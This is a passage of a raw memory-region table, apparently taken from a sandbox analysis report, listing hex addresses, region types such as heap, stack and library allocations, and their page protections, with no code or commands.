page read and write
|
||
7FFD9B9A3000
|
trusted library allocation
|
page execute and read and write
|
||
899000
|
heap
|
page read and write
|
||
730000
|
heap
|
page read and write
|
||
1EDBD000
|
stack
|
page read and write
|
||
1E89D000
|
stack
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
3740000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
4E1F000
|
stack
|
page read and write
|
||
3A3F000
|
stack
|
page read and write
|
||
7FFD9B974000
|
trusted library allocation
|
page read and write
|
||
3736000
|
trusted library allocation
|
page read and write
|
||
37CA000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
4E60000
|
direct allocation
|
page execute and read and write
|
||
87A000
|
heap
|
page read and write
|
||
3786000
|
heap
|
page read and write
|
||
36EE000
|
stack
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
7D2000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
3B7F000
|
stack
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3C3E000
|
stack
|
page read and write
|
||
10C1000
|
unkown
|
page execute and write copy
|
||
802000
|
heap
|
page read and write
|
||
3742000
|
heap
|
page read and write
|
||
2491147B000
|
heap
|
page read and write
|
||
22799090000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
2CBE000
|
stack
|
page read and write
|
||
3790000
|
heap
|
page read and write
|
||
306F000
|
stack
|
page read and write
|
||
870000
|
heap
|
page read and write
|
||
1DFDEF00000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
104F000
|
stack
|
page read and write
|
||
13229000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9FC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA2C000
|
trusted library allocation
|
page execute and read and write
|
||
373E000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
A22000
|
heap
|
page read and write
|
||
3BFF000
|
stack
|
page read and write
|
||
1301000
|
heap
|
page read and write
|
||
4C90000
|
direct allocation
|
page execute and read and write
|
||
7BB000
|
heap
|
page read and write
|
||
6A00000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
1BB5D000
|
stack
|
page read and write
|
||
28F7000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
383F000
|
stack
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
777000
|
heap
|
page read and write
|
||
37F4000
|
heap
|
page read and write
|
||
212B53FD000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
317F000
|
stack
|
page read and write
|
||
373B000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
3746000
|
heap
|
page read and write
|
||
CE5000
|
heap
|
page read and write
|
||
1C34E000
|
stack
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
1E03B000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
2D6F000
|
stack
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
26CC2630000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
7FFD9BA86000
|
trusted library allocation
|
page execute and read and write
|
||
379E000
|
heap
|
page read and write
|
||
E00000
|
unkown
|
page execute and read and write
|
||
7BE000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
54B0000
|
direct allocation
|
page execute and read and write
|
||
3797000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
212B5580000
|
heap
|
page read and write
|
||
2F9F000
|
stack
|
page read and write
|
||
2B2E000
|
stack
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
32F1000
|
trusted library allocation
|
page read and write
|
||
2A3E000
|
stack
|
page read and write
|
||
1DFDEF59000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
783000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
15952D19000
|
heap
|
page read and write
|
||
3768000
|
heap
|
page read and write
|
||
4C00000
|
direct allocation
|
page execute and read and write
|
||
F14000
|
unkown
|
page execute and read and write
|
||
4841000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
756000
|
heap
|
page read and write
|
||
54C0000
|
direct allocation
|
page execute and read and write
|
||
3FAE000
|
stack
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
C28000
|
unkown
|
page execute and read and write
|
||
1BF7F000
|
stack
|
page read and write
|
||
7AC000
|
heap
|
page read and write
|
||
37E0000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
7FFD9B9CD000
|
trusted library allocation
|
page execute and read and write
|
||
7DA4000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
58A17DC000
|
stack
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
C89000
|
unkown
|
page read and write
|
||
1D79E000
|
stack
|
page read and write
|
||
3742000
|
heap
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page execute and read and write
|
||
7CB000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
17B0000
|
trusted library allocation
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
5530000
|
direct allocation
|
page execute and read and write
|
||
762000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
396E000
|
stack
|
page read and write
|
||
35FE000
|
stack
|
page read and write
|
||
2D8F2FE0000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3417000
|
trusted library allocation
|
page read and write
|
||
212B5403000
|
heap
|
page read and write
|
||
4A70000
|
direct allocation
|
page execute and read and write
|
||
38F3000
|
trusted library allocation
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3CFE000
|
stack
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
24911458000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
1FA3FCA0000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
BB8000
|
heap
|
page read and write
|
||
7DA0000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
13413000
|
trusted library allocation
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
1DFDEFA4000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
40B000
|
unkown
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
3773000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1C54E000
|
stack
|
page read and write
|
||
3777000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
BEE000
|
stack
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
37C9000
|
heap
|
page read and write
|
||
12DE000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
B00000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
37C9000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
35BF000
|
stack
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
1DFDEF47000
|
heap
|
page read and write
|
||
4CD0000
|
direct allocation
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
9AF000
|
stack
|
page read and write
|
||
1DA8E000
|
stack
|
page read and write
|
||
35BF000
|
stack
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
3777000
|
heap
|
page read and write
|
||
378A000
|
heap
|
page read and write
|
||
3796000
|
heap
|
page read and write
|
||
AC2BDAB000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
8CA000
|
heap
|
page read and write
|
||
4C80000
|
direct allocation
|
page execute and read and write
|
||
3767000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3742000
|
heap
|
page read and write
|
||
282E000
|
stack
|
page read and write
|
||
566E000
|
stack
|
page read and write
|
||
F3A7B4A000
|
stack
|
page read and write
|
||
15952D08000
|
heap
|
page read and write
|
||
10BE000
|
unkown
|
page execute and read and write
|
||
3758000
|
heap
|
page read and write
|
||
375E000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
3782000
|
heap
|
page read and write
|
||
321E000
|
stack
|
page read and write
|
||
37A1000
|
heap
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
323F000
|
stack
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
2D6E2C50000
|
heap
|
page read and write
|
||
387E000
|
stack
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
212B53B0000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37C5000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
A0000
|
heap
|
page read and write
|
||
3754000
|
heap
|
page read and write
|
||
1A0000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
374C000
|
heap
|
page read and write
|
||
1E4DA000
|
heap
|
page read and write
|
||
4A90000
|
direct allocation
|
page execute and read and write
|
||
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
802000
|
heap
|
page read and write
|
||
8CB000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
1DFDEF54000
|
heap
|
page read and write
|
||
1490000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
4610000
|
heap
|
page read and write
|
||
C8B000
|
unkown
|
page execute and read and write
|
||
830000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
F2A000
|
unkown
|
page execute and write copy
|
||
377F000
|
heap
|
page read and write
|
||
2D6E2870000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
7FFD9B9CC000
|
trusted library allocation
|
page execute and read and write
|
||
830000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
1FA3FCD8000
|
heap
|
page read and write
|
||
7AD000
|
heap
|
page read and write
|
||
37E0000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
153E000
|
stack
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
C82000
|
unkown
|
page execute and read and write
|
||
37E0000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
374E000
|
heap
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
45EE000
|
stack
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
3762000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
373C000
|
heap
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
374C000
|
heap
|
page read and write
|
||
3E3E000
|
stack
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
DFF000
|
unkown
|
page execute and write copy
|
||
37AC000
|
heap
|
page read and write
|
||
286E000
|
stack
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
3777000
|
heap
|
page read and write
|
||
37C7000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1540000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
212B5416000
|
heap
|
page read and write
|
||
74C000
|
heap
|
page read and write
|
||
BCD000
|
heap
|
page read and write
|
||
7F6000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
422E000
|
stack
|
page read and write
|
||
3796000
|
heap
|
page read and write
|
||
820000
|
trusted library allocation
|
page read and write
|
||
1BF70000
|
heap
|
page read and write
|
||
E40000
|
heap
|
page read and write
|
||
355F000
|
trusted library allocation
|
page read and write
|
||
15952D2A000
|
heap
|
page read and write
|
||
F2B000
|
unkown
|
page execute and write copy
|
||
3783000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
212B53EB000
|
heap
|
page read and write
|
||
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
1C0000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
27AE000
|
stack
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
3D3F000
|
stack
|
page read and write
|
||
7FFD9B9FC000
|
trusted library allocation
|
page execute and read and write
|
||
4710000
|
trusted library allocation
|
page read and write
|
||
518E000
|
stack
|
page read and write
|
||
C89000
|
unkown
|
page read and write
|
||
40F000
|
unkown
|
page write copy
|
||
802000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
378C000
|
heap
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
22799095000
|
heap
|
page read and write
|
||
1CB4E000
|
stack
|
page read and write
|
||
10BF000
|
unkown
|
page execute and write copy
|
||
2C7F000
|
stack
|
page read and write
|
||
C8B000
|
unkown
|
page execute and read and write
|
||
377D000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
68E000
|
stack
|
page read and write
|
||
BF4000
|
stack
|
page read and write
|
||
26CC28D0000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
30AE000
|
stack
|
page read and write
|
||
4EC0000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
212B5720000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
3561000
|
trusted library allocation
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
37F0000
|
heap
|
page read and write
|
||
3757000
|
heap
|
page read and write
|
||
377E000
|
heap
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
374A000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
1FA3FEA5000
|
heap
|
page read and write
|
||
3757000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
1D28E000
|
stack
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
5490000
|
direct allocation
|
page execute and read and write
|
||
7BE000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
3705000
|
heap
|
page read and write
|
||
372000
|
unkown
|
page readonly
|
||
8B4000
|
heap
|
page read and write
|
||
1E05D000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
28F0000
|
heap
|
page read and write
|
||
C66000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
95B000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
8CC000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
7FFD9BB27000
|
trusted library allocation
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
482F000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
2D8F1400000
|
heap
|
page read and write
|
||
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
1D4AF000
|
stack
|
page read and write
|
||
2D8F1660000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
4E90000
|
direct allocation
|
page execute and read and write
|
||
629F000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
F2A000
|
unkown
|
page execute and read and write
|
||
3EBE000
|
stack
|
page read and write
|
||
F3A85FE000
|
stack
|
page read and write
|
||
C62A2FC000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
F3A82FE000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
212B53FD000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
37B2000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
3787000
|
heap
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
777000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
801C000
|
stack
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
2F6F000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
37A1000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
3752000
|
heap
|
page read and write
|
||
3404FF000
|
unkown
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
7FFD9BA5C000
|
trusted library allocation
|
page execute and read and write
|
||
8BB000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
53CF000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
746000
|
heap
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
C7B000
|
heap
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
8CC000
|
heap
|
page read and write
|
||
12FE000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
D20000
|
heap
|
page execute and read and write
|
||
37AC000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
ACE000
|
heap
|
page read and write
|
||
1E060000
|
heap
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
1C150000
|
heap
|
page read and write
|
||
C20000
|
unkown
|
page readonly
|
||
800000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
C33000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
811C000
|
stack
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
1E1AE000
|
stack
|
page read and write
|
||
4441000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
374E000
|
heap
|
page read and write
|
||
3752000
|
heap
|
page read and write
|
||
37B6000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
13221000
|
trusted library allocation
|
page read and write
|
||
37CD000
|
heap
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
3FBF000
|
stack
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
93A000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
74E000
|
heap
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
40FF000
|
stack
|
page read and write
|
||
2D8F1680000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
2D6E2C55000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
40EE000
|
stack
|
page read and write
|
||
375D000
|
heap
|
page read and write
|
||
BB5000
|
heap
|
page read and write
|
||
37B4000
|
heap
|
page read and write
|
||
1CBED000
|
stack
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
40B000
|
unkown
|
page write copy
|
||
8B4000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
31BE000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3747000
|
heap
|
page read and write
|
||
5520000
|
direct allocation
|
page execute and read and write
|
||
43BE000
|
stack
|
page read and write
|
||
2DFE000
|
stack
|
page read and write
|
||
2CFF000
|
stack
|
page read and write
|
||
3E2F000
|
stack
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
4ED0000
|
direct allocation
|
page execute and read and write
|
||
3767000
|
heap
|
page read and write
|
||
137D000
|
heap
|
page read and write
|
||
1E5000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
3780000
|
trusted library allocation
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
38B1000
|
trusted library allocation
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
77C000
|
heap
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
12BF000
|
heap
|
page read and write
|
||
15952CDB000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
E11000
|
unkown
|
page execute and read and write
|
||
8C0000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
3782000
|
heap
|
page read and write
|
||
358F000
|
trusted library allocation
|
page read and write
|
||
3740000
|
trusted library allocation
|
page read and write
|
||
378C000
|
heap
|
page read and write
|
||
212B53B7000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
347F000
|
stack
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
AC2C1FF000
|
stack
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3777000
|
heap
|
page read and write
|
||
423F000
|
stack
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
45FF000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
1DFDEF5D000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
4441000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
14FE000
|
stack
|
page read and write
|
||
7FFD9BA5C000
|
trusted library allocation
|
page execute and read and write
|
||
37AF000
|
heap
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
3739000
|
heap
|
page read and write
|
||
135C1000
|
trusted library allocation
|
page read and write
|
||
7AE000
|
heap
|
page read and write
|
||
40B000
|
unkown
|
page write copy
|
||
11CD000
|
stack
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
15952C70000
|
heap
|
page read and write
|
||
427E000
|
stack
|
page read and write
|
||
3746000
|
heap
|
page read and write
|
||
377E000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
378C000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
32D7000
|
trusted library allocation
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
32EF000
|
stack
|
page read and write
|
||
397F000
|
stack
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
B0000
|
heap
|
page read and write
|
||
3792000
|
heap
|
page read and write
|
||
3785000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
249117E5000
|
heap
|
page read and write
|
||
B7A000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
443F000
|
stack
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
C6A000
|
unkown
|
page execute and write copy
|
||
747000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
1065000
|
heap
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
8CF000
|
heap
|
page read and write
|
||
3751000
|
heap
|
page read and write
|
||
3F7E000
|
stack
|
page read and write
|
||
93B000
|
heap
|
page read and write
|
||
BF6000
|
heap
|
page read and write
|
||
1CD5E000
|
stack
|
page read and write
|
||
43BE000
|
stack
|
page read and write
|
||
3739000
|
heap
|
page read and write
|
||
40F000
|
unkown
|
page write copy
|
||
8CA000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
9CB000
|
unkown
|
page execute and read and write
|
||
1F0000
|
trusted library allocation
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
528F000
|
stack
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
4EB0000
|
direct allocation
|
page execute and read and write
|
||
914000
|
heap
